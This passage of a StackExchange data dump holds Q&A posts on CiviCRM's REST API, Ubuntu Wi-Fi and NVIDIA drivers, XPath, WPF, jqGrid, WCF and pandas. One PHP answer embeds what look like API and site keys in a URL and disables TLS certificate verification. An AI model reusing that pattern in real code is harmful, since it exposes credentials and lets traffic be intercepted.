The subjective side at the same time asserted itself with \n corresponding emphasis: man became a spiritual individual, and recognized himself as such.\"25\n\n25 just references this.\nComment: I'm not entirely sure this is within the scope of history. I _think_ what the author is trying to say is merely that man needed to understand himself and his place in the universe. Historical methods can be used to decode overly flowery prose, but i'm not sure that history is the best tool here; literature or poetry might be more appropriate.\nComment: @kimchilover. Looks like an answer to me\nComment: This feels like it would be a better fit for EL&U.\nAnswer: Construing your question narrowly, as asking what \"turned within\" and \"turned without\" mean, the answer is plain. The first sentence of the passage in question is, in the original, \n\nIm Mittelalter lagen die beiden Seiten des Bewusstseins ---\n nach der Welt hin und nach dem Innern des Menschen selbst ---\n wie unter einem gemeinsmen Schleier tr\u00e4umend oder halbwach.\n\nGoogle Englishes it thus:\n\nIn the Middle Ages, the two sides of consciousness lay ---\n to the world and to the interior of man himself ---\n as if dreaming under a common veil or half awake.\n\nI would tinker, and say \n\nIn the Middle ages, both aspects of human consciousness --- the outward looking one facing the world, and the introspective one --- lay, in effect, under a veil, dreaming or half awake.\n\nBoth of which are close enough to the translation in your book.\nThe metaphor here is that consciousness is an eye, seeing either the outside world or one's inward nature. But a vile veil distorts what it sees, and (B goes on to say) the veil was first lifted in Italy.\nThe larger question, of what Burkhardt meant, or whether he was right, or why he was sure he was right, or what a well-educated mind should make of all of this, is beyond my ken or care.\n","meta":{"source":"history.stackexchange","title":"What did Jacob Burckhardt intend to say by 'turn within' and 'turn without'?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to use CiviCRM REST API in external PHP code\n\nQuestion: Been trying to get this to work for hours. Help would be greatly appreciated. userkey and sitekey are replaced with actual keys.\nI'm trying to run in a php file:\n<code>$result = curl -X POST \"https:\/\/www.mysite.org\/sites\/all\/modules\/civicrm\/extern\/rest.php?entity=Membership&action=get&api_key=userkey&key=sitekey&json={\"sequential\":1,\"return\":\"membership_type_id,id,end_date\",\"contact_id\":2,\"active_only\":1,\"options\":{\"limit\":1,\"sort\":\"join_date DESC\"}}\";\n<\/code>\nI get the error:\n<code>PHP Parse error: syntax error, unexpected 'POST' (T_STRING) in \/home\/spulver\/civicrmapi.php on line 3\n<\/code>\nAny ideas how to fix?\nAnswer: I use CURL to call rest api. 
Here is the snippet you can ignore\/remove many lines that sets curl variable.\n<code>$url = 'http:\/\/domain.org\/sites\/all\/modules\/civicrm\/extern\/rest.php?entity=Contact&action=getsingle&api_key=HR76BS710C&key=8c1cf9913fd674e08c8f27804334eb5a&json={\"id\":1}';\n\n$ch = curl_init();\n\/\/http:\/\/php.net\/manual\/en\/function.curl-setopt.php\n\/\/$ch = curl_init($url);\ncurl_setopt($ch, CURLOPT_URL, $url);\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\n\/\/curl_setopt($ch, CURLOPT_TIMEOUT, 5);\n\/\/curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);\ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);\ncurl_setopt($ch, CURLOPT_ENCODING, \"\");\n\n\/\/for debugging?\ncurl_setopt($ch, CURLOPT_VERBOSE, true);\n\n$data = curl_exec($ch);\ncurl_close($ch);\n$obj = json_decode($data);\n<\/code>\nHTH\nPradeep\nAnswer: you need to replace the url parameters api_key and key with the relevant keys. \nMore information can be found in the developer documents.\nComment: in addition to @pradeep-nayak answer\nComment: Yes I have replaced the keys in my actual code. Not posting them here. THanks\n","meta":{"source":"civicrm.stackexchange","title":"How to use CiviCRM REST API in external PHP code","dup_signals":{}},"subset":"stackexchange"} +{"text":"WiFi is disconnecting intermittently on ACER E5-573G with a Linux platform\n\nQuestion: I dual booted my Laptop Acer Aspire E5-573G with Windows 10 and Ubuntu 18.04 and since the first day the WIFI is connecting and disconnecting frequently.\nI have been searching in others questions but I do not know to fix it on my own.\nFrom what I have learned from the other questions I leave here the results of the following commands:\n\nsudo lspci -v\n\n<code>03:00.0 Network controller: Qualcomm Atheros QCA9377 802.11ac Wireless Network Adapter (rev 30)\n Subsystem: Lite-On Communications Inc QCA9377 802.11ac Wireless Network Adapter\n Flags: bus master, fast devsel, latency 0, IRQ 52\n Memory at c4200000 (64-bit, non-prefetchable) [size=2M]\n Capabilities: [40] Power Management version 3\n Capabilities: [50] MSI: Enable+ Count=1\/8 Maskable+ 64bit-\n Capabilities: [70] Express Endpoint, MSI 00\n Capabilities: [100] Advanced Error Reporting\n Capabilities: [148] Virtual Channel\n Capabilities: [168] Device Serial Number 00-00-00-00-00-00-00-00\n Capabilities: [178] Latency Tolerance Reporting\n Capabilities: [180] L1 PM Substates\n Kernel driver in use: ath10k_pci\n Kernel modules: ath10k_pci\n<\/code>\n\ndmesg | grep ath10k\n\n<code>[ 3.139494] ath10k_pci 0000:03:00.0: pci irq msi oper_irq_mode 2 irq_mode 0 reset_mode 0\n[ 3.472128] ath10k_pci 0000:03:00.0: qca9377 hw1.0 target 0x05020000 chip_id 0x003820ff sub 11ad:0806\n[ 3.472131] ath10k_pci 0000:03:00.0: kconfig debug 0 debugfs 1 tracing 1 dfs 0 testmode 0\n[ 3.472641] ath10k_pci 0000:03:00.0: firmware ver WLAN.TF.2.1-00021-QCARMSWP-1 api 6 features wowlan,ignore-otp crc32 42e41877\n[ 3.539849] ath10k_pci 0000:03:00.0: board_file api 2 bmi_id N\/A crc32 8aedfa4a\n[ 5.738498] ath10k_pci 0000:03:00.0: unsupported HTC service id: 1536\n[ 5.757526] ath10k_pci 0000:03:00.0: htt-ver 3.56 wmi-op 4 htt-op 3 cal otp max-sta 32 raw 0 hwcrypto 1\n[ 5.841254] ath10k_pci 0000:03:00.0 wlp3s0: renamed from wlan0\n[ 8.151592] ath10k_pci 0000:03:00.0: unsupported HTC service id: 1536\n[ 352.551446] ath10k_pci 0000:03:00.0: unsupported HTC service id: 1536\n\n<\/code>\nThanks to all the people that is going to read this post and help me (and 
to others with the same\/similar problem).\nComment: Edit your question and show me `iwlist wlan0 scan | grep -i cell -A5`, changing wlan0 to your appropriate wireless device. What wireless network do you normally use? Post the output to paste.ubuntu.com and give me the URL. Start comments to me with @heynnema or I may miss them.\nComment: @heynnema\nThank you very much heynnema, but I have already fix the issue.\nAnswer: @heynnema\nThank you very much heynnema, but I have already fix the issue.\nI have modified this answers \"No Wifi on Acer Aspire E5 573 on any Linux Platform\" and \"https:\/\/esc.sh\/blog\/wifi-issue-on-acer-laptops-running-linux-qualcomm-atheros-device-0042\/\" and it work for the moment. I didn't want to try before because I don't understand very well what the different files are for, but I've taken a risk and it seems that work.\nMy solution:\n<code>git clone https:\/\/github.com\/kvalo\/ath10k-firmware.git\nsudo cp -r ath10k-firmware\/QCA9377 \/lib\/firmware\/ath10k\/\nsudo mv \/lib\/firmware\/ath10k\/QCA9377\/hw1.0\/CNSS.TF.1.0\/firmware-5.bin_CNSS.TF.1.0-00267-QCATFSWPZ-1 \/lib\/firmware\/ath10k\/QCA9377\/hw1.0\/firmware-5.bin\n<\/code>\nand again heynnema thank you very much for help me answering the question.\n","meta":{"source":"askubuntu","title":"WiFi is disconnecting intermittently on ACER E5-573G with a Linux platform","dup_signals":{}},"subset":"stackexchange"} +{"text":"X-Editable Select2 with key and value\n\nQuestion: In X-Editable using select2 tags, why can't we give key and value to select multiple values. is there any solution?\nAnswer: <code> $('#username').editable({\n source: [ {value: 1, text: 'Male'},\n {value: 2, text: 'Female'}],\n select2: {\n multiple: true, \/\/ for multiple select 2 values\n },\n pk: 1, \/\/ primary key\n url: 'post.aspx',\n name: 'username'\n });\n<\/code>\nComment: Please add some comments about your solution on why and how it solves the problem\nComment: use this file as a reference for all your use cases https:\/\/vitalets.github.io\/x-editable\/assets\/demo.js\nAbove mentioned javascript is a file behind x-editable demo\nhttps:\/\/vitalets.github.io\/x-editable\/demo-bs3.html?c=inline#\n","meta":{"source":"stackoverflow","title":"X-Editable Select2 with key and value","dup_signals":{}},"subset":"stackexchange"} +{"text":"c# wpf row definition\n\nQuestion: I need a help about some code. how can i split a row into two columns.My code is under this text.\n<code> <Grid.RowDefinitions>\n <RowDefinition Height=\"30\"\/>\n <RowDefinition Height=\"50\"\/>\n <RowDefinition Height=\"50\"\/>\n <RowDefinition Height=\"50\"\/>\n <RowDefinition Height=\"30\"\/>\n <RowDefinition Height=\"*\"\/>\n <\/Grid.RowDefinitions>\n <StackPanel Grid.Row=\"0\">\n<\/code>\nso how can i split row 0 into two columns, thanks\nAnswer: Put a <code>Grid<\/code> with 2 columns inside row 0 of the main <code>Grid<\/code>. 
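A minimal sketch of that first option (the two <code>TextBlock<\/code> children are just placeholders for whatever content goes in each half):\n<code><Grid Grid.Row=\"0\">\n    <Grid.ColumnDefinitions>\n        <ColumnDefinition Width=\"*\"\/>\n        <ColumnDefinition Width=\"*\"\/>\n    <\/Grid.ColumnDefinitions>\n    <TextBlock Grid.Column=\"0\" Text=\"Left\"\/>\n    <TextBlock Grid.Column=\"1\" Text=\"Right\"\/>\n<\/Grid>\n<\/code>\n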
Or, declare your grid as having 2 columns and set whatever you place in every row except row 0 with <code>ColumnSpan = 2<\/code>.\nAnswer: You just need to add \n<code><Grid.ColumnDefinitions>\n <ColumnDefinition Width=\"*\" \/>\n <ColumnDefinition Width=\"*\" \/>\n<\/Grid.ColumnDefinitions>\n<\/code>\nand then to put your StackPanel in the first row and the first column\n<code><StackPanel Grid.Row=\"0\" Grid.Column=\"0\" Grid.ColumnSpan=\"2\">\n<\/StackPanel >\n<\/code>\nand modify the span if you want a control to span over multiple cells\n","meta":{"source":"stackoverflow","title":"c# wpf row definition","dup_signals":{}},"subset":"stackexchange"} +{"text":"XPath to select an element if previous element contain a matching text() - Python, Scrapy\n\nQuestion: I want to extract an element if the previous elements text() matches specific criteria. for example,\n<code><html>\n<div>\n<table class=\"layouttab\">\n <tbody>\n <tr>\n <td scope=\"row\" class=\"srb\">General information:  <\/td>\n <td>(xxx) yyy-zzzz<\/td>\n <\/tr>\n <tr>\n <td scope=\"row\" class=\"srb\">Website:  <\/td>\n <td><a href=\"http:\/\/xyz.edu\" target=\"_blank\">http:\/\/www.xyz.edu<\/a>\n <\/td>\n <\/tr>\n <tr>\n <td scope=\"row\" class=\"srb\">Type:  <\/td>\n <td>4-year, Private for-profit<\/td>\n <\/tr>\n <tr>\n <td scope=\"row\" class=\"srb\">Awards offered:  <\/td>\n <td>Less than one year certificate<br>One but less than two years certificate<br>Associate's degree<br>Bachelor's\n degree\n <\/td>\n <\/tr>\n <tr>\n <td scope=\"row\" class=\"srb\">Campus setting:  <\/td>\n <td>City: Small<\/td>\n <\/tr>\n <tr>\n <td scope=\"row\" class=\"srb\">Related Institutions:<\/td>\n <td><a href=\"?q=xyz\">xyz-New York<\/a>\n (Parent):\n <ul>\n <li style=\"list-style:circle\">Berkeley College - Westchester Campus<\/li>\n <\/ul>\n <\/td>\n <\/tr>\n <\/tbody>\n<\/table>\n<\/div>\n<\/html>\n<\/code>\nNow, I want to extract the URL if the previous element has \"Website: \" in text() properties. \nI am using python 2.x with scrapy 0.14. I was able to extract data using individual element such as\n<code> item['Header_Type']= site.select('div\/table[@class=\"layouttab\"]\/tr[3]\/td[2]\/text()').extract()\n<\/code>\nBut this approach fails if the website parameter is missing and the tr[3] shift upward and i get 'Type' in website element and 'Awards offered' in Type.\nIs there a specific command in xPath like,\n<code>'div\/table[@class=\"layouttab\"]\/tr\/td[2] {if td[1] has text = \"Website\"}\n<\/code>\nThanks in advance.\nAnswer: For python and scrapy you should use following to select \"Type\" field,\nworked great for me.\n<code>item['Header_Type']= site.select('div[1]\/table[@class=\"layouttab\"]\/tr\/td[contains(text(),\"Type\")]\/following-sibling::td[1]\/text()').extract()\n<\/code>\nAnswer: <code>div\/table[@class=\"layouttab\"]\\tr\\td[text()=\"Website\"]\\following-sibling::node()<\/code> will work, I think. Otherwise, you could user <code>parent<\/code> and go to <code>td[2]<\/code> from there.\nAnswer: The following XPath will do:\n<code>\/html\/div\/table[@class='layouttab']\/tbody\/tr\/td[contains(text(),'Website')]\/following-sibling::td[1]\n<\/code>\nAnswer: This works for me:\n<code>\/html\/div\/table[@class=\"layouttab\"]\/tbody\/tr\/td[. 
= 'Website:\u00a0\u00a0']\/following-sibling::td\/a\/text()\n<\/code>\n\nDrill down till <code>td<\/code> and see if its text matches <code>Website:<\/code>\nUse <code>following-sibling<\/code> to go to the next <code>td<\/code>\nDrill down to retrieve the <code>a<\/code> and get the URL using <code>text()<\/code>\nAnswer: This will also work.. And is more generic..\n<code>\/\/table[@class='layouttab']\/\/td[contains(text(),'Website')]\/following-sibling::td\/\/text()\n<\/code>\nIf there is only one table on the page where u are extracting data then this will also work..\n<code>\/\/td[contains(text(),'Website')]\/following-sibling::td\/\/text()\n<\/code>\n","meta":{"source":"stackoverflow","title":"XPath to select an element if previous element contain a matching text() - Python, Scrapy","dup_signals":{}},"subset":"stackexchange"} +{"text":"unmet dependencies when Installing NVidia 460 driver\n\nQuestion: it seems I am not able to upgrade from 450 driver to 460. Following is the output:\n<code>$ nvidia-smi\nTue Mar 2 10:12:34 2021 \n+-----------------------------------------------------------------------------+\n| NVIDIA-SMI 450.102.04 Driver Version: 450.102.04 CUDA Version: 11.0 |\n|-------------------------------+----------------------+----------------------+\n| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |\n| Fan Temp Perf Pwr:Usage\/Cap| Memory-Usage | GPU-Util Compute M. |\n| | | MIG M. |\n|===============================+======================+======================|\n| 0 GeForce GTX 1050 Off | 00000000:01:00.0 Off | N\/A |\n| N\/A 64C P0 N\/A \/ N\/A | 1086MiB \/ 2000MiB | 36% Default |\n| | | N\/A |\n+-------------------------------+----------------------+----------------------+\n \n+-----------------------------------------------------------------------------+\n| Processes: |\n| GPU GI CI PID Type Process name GPU Memory |\n| ID ID Usage |\n|=============================================================================|\n| 0 N\/A N\/A 1421 G \/usr\/lib\/xorg\/Xorg 192MiB |\n| 0 N\/A N\/A 6321 G \/usr\/lib\/xorg\/Xorg 459MiB |\n| 0 N\/A N\/A 6494 G \/usr\/bin\/gnome-shell 332MiB |\n| 0 N\/A N\/A 7090 G \/usr\/lib\/firefox\/firefox 1MiB |\n| 0 N\/A N\/A 8188 G \/usr\/lib\/firefox\/firefox 1MiB |\n| 0 N\/A N\/A 9017 G \/usr\/lib\/firefox\/firefox 1MiB |\n| 0 N\/A N\/A 9064 G \/usr\/lib\/firefox\/firefox 1MiB |\n| 0 N\/A N\/A 9227 G \/usr\/lib\/firefox\/firefox 1MiB |\n| 0 N\/A N\/A 9731 G \/usr\/lib\/firefox\/firefox 1MiB |\n| 0 N\/A N\/A 12448 G \/usr\/lib\/firefox\/firefox 1MiB |\n| 0 N\/A N\/A 24608 G \/usr\/lib\/firefox\/firefox 1MiB |\n| 0 N\/A N\/A 99825 G ...\/.steam\/ubuntu12_32\/steam 33MiB |\n| 0 N\/A N\/A 99834 G .\/steamwebhelper 1MiB |\n| 0 N\/A N\/A 99847 G ...AAAAAAAgAAAAAAAAA --log-f 39MiB |\n+-----------------------------------------------------------------------------+\n$\u00a0sudo apt install nvidia-driver-460\nReading package lists... Done\nBuilding dependency tree \nReading state information... Done\nSome packages could not be installed. 
This may mean that you have\nrequested an impossible situation or if you are using the unstable\ndistribution that some required packages have not yet been created\nor been moved out of Incoming.\nThe following information may help resolve the situation:\n\nThe following packages have unmet dependencies:\n nvidia-driver-460 : Depends: libnvidia-gl-460 (= 460.39-0ubuntu0.20.04.1) but it is not going to be installed\n Depends: libnvidia-extra-460 (= 460.39-0ubuntu0.20.04.1) but it is not going to be installed\n Depends: nvidia-compute-utils-460 (= 460.39-0ubuntu0.20.04.1) but it is not going to be installed\n Depends: libnvidia-decode-460 (= 460.39-0ubuntu0.20.04.1) but it is not going to be installed\n Depends: libnvidia-encode-460 (= 460.39-0ubuntu0.20.04.1) but it is not going to be installed\n Depends: nvidia-utils-460 (= 460.39-0ubuntu0.20.04.1) but it is not going to be installed\n Depends: xserver-xorg-video-nvidia-460 (= 460.39-0ubuntu0.20.04.1) but it is not going to be installed\n Depends: libnvidia-cfg1-460 (= 460.39-0ubuntu0.20.04.1) but it is not going to be installed\n Depends: libnvidia-ifr1-460 (= 460.39-0ubuntu0.20.04.1) but it is not going to be installed\n Depends: libnvidia-fbc1-460 (= 460.39-0ubuntu0.20.04.1) but it is not going to be installed\n Recommends: libnvidia-decode-460:i386 (= 460.39-0ubuntu0.20.04.1)\n Recommends: libnvidia-encode-460:i386 (= 460.39-0ubuntu0.20.04.1)\n Recommends: libnvidia-ifr1-460:i386 (= 460.39-0ubuntu0.20.04.1)\n Recommends: libnvidia-fbc1-460:i386 (= 460.39-0ubuntu0.20.04.1)\n Recommends: libnvidia-gl-460:i386 (= 460.39-0ubuntu0.20.04.1)\n<\/code>\nI checked online and people say to do purge first, but I suspect that it won't work. I am wondering is there anyone went through the path of this upgrade? Or should I wait for the next driver?\nComment: Do you have the `restricted` repo enabled? `sudo add-apt-repository restricted` That is where those dependencies come from.\nComment: @Terrance yes, `'restricted' distribution component is already enabled for all sources.`\nComment: What version of Ubuntu are you running?\nComment: I use Ubuntu 20.04.\nAnswer: You may try <code>sudo apt --fix-broken install<\/code> but I am not sure if it'll solve your problem.\n\npeople say to do purge first, but I suspect that it won't work\n\nWhy do you suspect this? Per nvidia docs you have to purge the older version before you can install a new one. Try:\n<code>sudo apt purge nvidia-*\nsudo apt autoremove\n<\/code>\nYou might have to restart at this point (If you get a blank screen, don't panic. You can login using alt-ctrl-F1 and install the new nvidia driver or switch to using nouveau till your install is done)\nComment: I read some people said it didn't work for them. I suppose I should pick a day and try myself. I will still have gui after I purge (like swtich back to xorg)?\nComment: It is a bit cumbersome for sure, but has improved a lot in recent versions. You will still have your gui after restart (if you switch over to nouveau) but you can also work through a terminal\n","meta":{"source":"askubuntu","title":"unmet dependencies when Installing NVidia 460 driver","dup_signals":{}},"subset":"stackexchange"} +{"text":"Load HTML of SubGrid without its expansion in JQGrid\n\nQuestion: In my ASP.NET MVC application, I have JQGrid and its SubGrid but I noticed on <code>onSelectRow<\/code> event it is not detecting Subgrid rows until I expand main grid rows. I am trying to select main grid row and on select, all sub grid row's checkbox should be selected. 
But it is not finding any SubGrid. But when I expand then it works. Am I missing any property of Grid or Subgrid?\n<code>$(\"#MyGrid\").jqGrid({\n datatype: 'local',\n colModel: [\n {\n name: 'ColSelected', label: ' ', width: 40, sortable: false,\n formatter: 'checkbox', align: 'center', formatoptions: { disabled: false },\n editable: true, edittype: \"checkbox\", editoptions: { value: \"Yes:No\", defaultValue: \"Yes\" }\n },\n { name: 'ColName', label: 'Column Name', width: 340, editable: false, sortable: false }],\n height: '100%',\n autowidth: true,\n multiselect: false,\n beforeSelectRow: function (rowid, event) {\n \/\/some of my code\n return true;\n },\n onSelectRow: function (rowid, status, event) {\n \/\/some of my code\n\n },\n gridComplete: function () {\n \/\/some of my code\n },\n loadComplete: function () {\n \/\/some of my code\n },\n subGrid: true,\n subGridOptions: {\n \"plusicon\": \"ui-icon-triangle-1-e\",\n \"minusicon\": \"ui-icon-triangle-1-s\",\n \"openicon\": \"ui-icon-arrowreturn-1-e\",\n \"reloadOnExpand\": false,\n \"selectOnExpand\": false\n },\n subGridRowExpanded: function (subgrid_id, row_id) {\n var subgrid_table_id = subgrid_id + \"_t\",\n pager_id = \"p_\" + subgrid_table_id,\n localRowData = $(this).jqGrid(\"getLocalRow\", row_id);\n $(\"#\" + subgrid_id).html(\"<table id='\" + subgrid_table_id + \"'><\/table><div id='\" + pager_id + \"'><\/div>\");\n $(\"#\" + subgrid_table_id).jqGrid({\n datatype: \"local\",\n data: localRowData.LanguageNames,\n colNames: [' ', 'Languages'],\n colModel: [\n {\n name: 'ColSelected', label: ' ', width: 40, sortable: false,\n formatter: 'checkbox', align: 'center', formatoptions: { disabled: false },\n editable: true, edittype: \"checkbox\", editoptions: { value: \"Yes:No\", defaultValue: \"Yes\" }\n },\n { name: 'Language', label: 'Languages', align: 'center', width: 150 }\n ],\n idPrefix: \"s_\" + row_id + \"_\",\n pager: \"#\" + pager_id,\n autowidth: true,\n sortname: \"num\",\n sortorder: \"asc\",\n height: \"55\",\n beforeSelectRow: function (rowid, event) {\n \/\/some of my code\n return true;\n },\n onSelectRow: function (rowid) \/\/some of my code\n },\n loadComplete: function () {\/\/some of my code\n }\n }).jqGrid('navGrid', \"#\" + pager_id, { edit: false, add: false, del: false });\n }\n });\n<\/code>\nAnswer: If I correctly understand the problem you can use the options selectOnExpand and selectOnCollapse (which are sbgrid options). By default they are false.\nI recommend you to consult the docs here\nComment: As I said if use **selectOnExpand** event then all HTML of subgrid will be prepared and I don't have problem there. But I want all subgrid table row and table data without expanding.\nComment: Not sure I understand, but data is loaded only if you expand it. You set reloadOnExpand to false, which is a solution, but the data should be already be loaded (i.e you should expand it once to get the html)\n","meta":{"source":"stackoverflow","title":"Load HTML of SubGrid without its expansion in JQGrid","dup_signals":{}},"subset":"stackexchange"} +{"text":"Custom small sized wallpapers in Ubuntu 17.10\n\nQuestion: When setting a wallpaper in Ubuntu 17.04 I could choose from tile, zoom, center, scale, fill or span options. \nWhere can I found option for 'center' wallpaper behaviour in Ubuntu 17.10?\n\nBackground: I use two monitors with different resolutions. So I was more than happy to use small image as a wallpaper with white colour filling the rest of the screen. 
\nThis was done through All Settings -> Appearance -> Look tab in Unity, where I could select option \"center\" and white colour to fill the rest.\nAfter updating to Ubuntu 17.10 I was not able to select my custom wallpaper from Background -> Wallpaper menu, so I went to the directory with the image and tried to \"Set as Wallpaper\" option in the menu, but it zoomed image to every screen resolution (it looks awful).\nSo I wonder - How can I set wallpaper to be centred without zoom and to use plain white colour for all the space left?\nComment: Related to: [Why aren't my pictures appearing in the \"pictures\" section of the change wallpapers window?](https:\/\/askubuntu.com\/questions\/960601\/why-arent-my-pictures-appearing-in-the-pictures-section-of-the-change-wallpap)\nAnswer: You may try using (GNOME) Tweaks. You may install it by running\n<code>sudo apt install gnome-tweak-tool\n<\/code>\nLaunch Tweaks and go to Desktop section and select \"Centered\" in Adjustment under Background:\n\nTo fill the rest of your background with while colour, run\n<code>gsettings set org.gnome.desktop.background primary-color '#FFFFFF'\n<\/code>\n(Or follow the advanced option of my answer here: \nChange background color to pitch black , for white you'll have to use <code>#FFFFFF<\/code> instead of <code>#000000<\/code>). \nComment: Thank you. I've installed `dconf-editor` and set *primary-color* to `#FFFFFF` for `\/org\/gnome\/desktop\/background\/`. It did the trick!\nComment: Cool, thanks. I was able to centered image as suggested! How can I change background colour to be white?\nComment: @StanislavBondarenko Also added a command-line way to change the background colour easily so that one doesn't have to use *dconf Editor*.\n","meta":{"source":"askubuntu","title":"Custom small sized wallpapers in Ubuntu 17.10","dup_signals":{}},"subset":"stackexchange"} +{"text":"What phase does stopPropagation effect?\n\nQuestion: According to quirksmode, modern browsers have a capturing phase and a bubbling phase. See here.\nIf I use stopPropagation in my event handler ( set to either phase by the Boolean argument ) how will it function?\nWill it work both ways? That is if I set it to capture mode, will it also prevent the bubbling phase. And vice-versa as well.\nHere is the W3 reference ( stopPropagation ).\nI'm troubleshooting an event handler, and need to understand exactly how <code>stopPropagation()<\/code> functions.\nAnswer: Stopping propagation during the capture phase will prevent further handlers from running, including handlers registered with the bubbling phase.\nThe W3C documentation on event flow says (emphasis mine):\n\nThis specification defines three event phases: capture phase; target\n phase; and bubble phase. Event objects complete these phases in the\n specified order using the partial propagation paths as defined below.\n A phase must be skipped if it is not supported, or if the event\n object's propagation has been stopped. 
For example, if the\n <code>Event.bubbles<\/code> attribute is set to false, the bubble phase will be\n skipped, and if <code>Event.stopPropagation()<\/code> has been called prior to the\n dispatch, all phases must be skipped.\n","meta":{"source":"stackoverflow","title":"What phase does stopPropagation effect?","dup_signals":{}},"subset":"stackexchange"} +{"text":"What is the difference between Policy15 and Policy12?\n\nQuestion: I've got a basic service host:\n<code>m_host = new ServiceHost(m_service, m_baseAddress);\nServiceMetadataBehavior behavior = new ServiceMetadataBehavior();\nbehavior.HttpGetEnabled = true;\nbehavior.MetadataExporter.PolicyVersion = PolicyVersion.Policy15;\nm_host.Description.Behaviors.Add(behavior);\nm_host.AddServiceEndpoint(\n typeof(IManagerService), \n new BasicHttpBinding(), m_soapAddress);\nm_host.Open();\n<\/code>\nMy question is how do I know which PolicyVersion to use? The MSDN is not very helpful, it seems to think I should know already if I want 1.2 or 1.5...\nPolicyVersion.Policy15 Property\nPolicyVersion.Policy12 Property\nComment: I think as long as you are consuming your own services, you probably don't have to worry about the policy version. If you have to expose your service to others that have specific policy version requirements, that's a different story. I would probably just go with the defaults unless you're actually having specific problems with the policy version and your metadata. In that case, you probably want to put that in your question.\nComment: I don't know the answer but appreciate the question. But [here's a list of changes from 1.2 to 1.5](http:\/\/markmail.org\/message\/rwlwlc4yop4vfgyr) in case you understand what they are talking about.\nComment: Are there old clients that only support 1.2 that I need to be aware of? Or is this all server side processing and I should always use the latest my framework supports?\nComment: I solved the actual problem I was having with metadata, this was just one stop on my investigation that I was not able to resolve. FYI this solved my actual problem, which is not directly related to this question: http:\/\/msdn.microsoft.com\/en-us\/library\/aa738489(v=vs.100).aspx\nComment: @Tombala when you say leave it at default, are you suggesting the policy version be not even set? All the MSDN examples manually set this value.\nComment: Actually, have you considered just exposing your service MEX endpoint using web.config preferences instead of writing code? Are you hosting your service outside of IIS through some windows service or something?\nComment: I'm using code instead of doing it all in config because the requirements call for some of the parameters to come from the customer's config file instead.\nComment: Ouch! Darn those requirements. :) I'm not sure what the default value for PolicyVersion would be. You should post your final code in its working condition and accept it as the answer.\nComment: I think you should post your link from your first comment and I'd accept that as the answer. 
The question had little to do with the problem I was debugging when I thought to ask it.\nAnswer: In case others wonder what changes there were from 1.2 to 1.5, here's a link that gives a list of changes.\nFrom Denise, MSDN has an article about how to publish your own metadata using code that helped get this running that you can find here.\nComment: BTW, the code as posted ran just fine on localhost, but didn't work across the network.\nComment: @DeniseSkidmore Did your service url have an IP address of `0` or `0.0.0.0`? If not, it might not be binding to the right IP. You also need to add a firewall exception for the appropriate port(s)\nComment: Nope. Not it. As noted in the comments below the question, the issue was in my metadata.\n","meta":{"source":"stackoverflow","title":"What is the difference between Policy15 and Policy12?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Add value from column based on other column through loop\n\nQuestion: I have the following data frame:\n<code>ViewKey Table_Name\ncar A\ncar B\nNaN C\nball D\nball E\n<\/code>\nand the following sentences:\n<code>contains_car = \" SELECT \\n keys \\n FROM *letter here* \\n LEFT JOIN \"\ncontains_ball = \" SELECT \\n keys \\n FROM *letter here* \\n RIGHT JOIN \"\ncontains_NaN = \" SELECT \\n keys \\n FROM *letter here* \\n ALL\"\n<\/code>\nI want to <code>\"print\"<\/code> with the following idea:\nIf my raw contains <code>car<\/code> print <code>contains_car<\/code> value but instead of <code>*letter here*<\/code> write corresponding value of column <code>Table_name<\/code>:\n<code># as it related to \"car\" value in the column it printed contains_car value. \n# And at the same time instead of *letter here* wrote A because for the first car value A is corresponding:\n\nSELECT \n keys \n FROM A\n LEFT JOIN\n\n SELECT \n keys \n FROM B \n LEFT JOIN\n\n SELECT \n keys \n FROM C\n ALL\n\n SELECT \n keys \n FROM D \n RIGHT JOIN\n\n SELECT \n keys \n FROM E \n RIGHT JOIN\n<\/code>\nI tried:\n<code>for i in df['ViewKey'].fillna(\"0\"):\n if 'car' in i:\n print(contains_car)\n elif 'ball' in i:\n print(contains_ball)\n elif '0' in i:\n print(contains_NaN)\n<\/code>\nIDK where to put if conditions\nAnswer: I think this should work for you:\n<code>df = df.fillna(\"0\")\nfor index, row in df.iterrows():\n if \"car\" in row['ViewKey']:\n print(contains_car.replace(\"*letter here*\", row['Table_Name']))\n if \"ball\" in row['ViewKey']:\n print(contains_ball.replace(\"*letter here*\", row['Table_Name']))\n if \"0\" in row['ViewKey']:\n print(contains_NaN.replace(\"*letter here*\", row['Table_Name']))\n<\/code>\nAnswer: If I understand your question correctly, then you can get your output without if-statements. If your dataframe name is <code>df<\/code>:\n<code>for index, row in df.iterrows():\n print(\"SELECT \\n keys \\n FROM {0} \\n {1}\\n\".format(row['Table_Name'], row['ViewKey']))\n<\/code>\nComment: A apologize for my question. I have changed it. Sorry for the time you spent\nAnswer: <code>for index, rows in df.iterrows():\n print(\"SELECT \\n keys \\n FROM {} \\n {} \\n\".format(row['Table_Name'], row['ViewKey']))\n<\/code>\nAbove is the code to simply print your requirement. If you want to do via loop, as you specified in the problem, then a problem that will arise is that <code>df['Table_Name'][df['ViewKey'] == 'car']<\/code> will output both 'A' and 'B', while only 1 is required at a time for printing. This will require 5 different ifs, which is absolutely unnecessary.\nComment: A apologize for my question. 
I have changed it. Sorry for the time you spent\nComment: Its alright @EndryCrue. Hope it helps some other solution seekers\n","meta":{"source":"stackoverflow","title":"Add value from column based on other column through loop","dup_signals":{}},"subset":"stackexchange"} +{"text":"Ubuntu 22.04.01: freeze-ups on refreshing from locked screen\n\nQuestion: After I upgraded to Ubuntu 22.04.01 last week, I have occasional freeze-ups on refreshing from a locked screen. My lock-screen requires my password to complete the re-opening. The freeze-ups occur about every fourth time. To recover, I have to power the desktop off and then restart. Obviously, an annoyance that I never had in 20.04. Any suggestions?\n\nNow, about a month later, with a belated thank-you to Mossroy for his workaround. However, something seems to have been fixed in the underlying software. I have not had any of the above-mentioned freeze-ups since October 6, with about a fifty flawless wake-ups after that. Someone among the Ubuntu update maintainers must have learned about the problem -- perhaps even from here -- and fixed it. There has been at least one, maybe several, system updates since that last freeze-up.\n\nMy first answer is not entirely correct, and it may have been unfair for me to put the blame on the Super-L keystroke. Letting the screen lock happen with the automatic delay, I find, now also leads to 